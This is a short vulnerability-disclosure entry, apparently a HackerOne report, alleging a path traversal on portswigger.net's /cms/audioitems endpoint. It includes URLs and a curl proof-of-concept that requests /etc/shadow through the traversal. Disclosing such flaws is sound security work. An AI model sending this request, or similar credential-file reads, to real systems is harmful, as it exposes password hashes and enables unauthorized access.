Lucene search

K

0xd0m7H1:2424815

HistoryMar 20, 2024 - 7:26 a.m.

PortSwigger Web Security: [portswigger.net] Path Traversal al /cms/audioitems

2024-03-2007:26:28

0xd0m7

hackerone.com

41

portswigger web security

path traversal

vulnerability

remote attackers

internal files

privilege escalation

7 High

AI Score

Confidence

Low

Prelude.
I wasn’t going to report it, I thought it was your laboratory but after my first analysis this seems real.

Description
It’s detected a path traversal as root user that allows to remote attackers see internal files as root.

https://portswigger.net/cms/audioitems//etc/networks
https://portswigger.net/cms/audioitems//etc/shadow

Poc
curl -kis "https://portswigger.net/cms/audioitems//etc/shadow"
{F3132191}

Impact

Abilit to read internal files as root

7 High

AI Score

Confidence

Low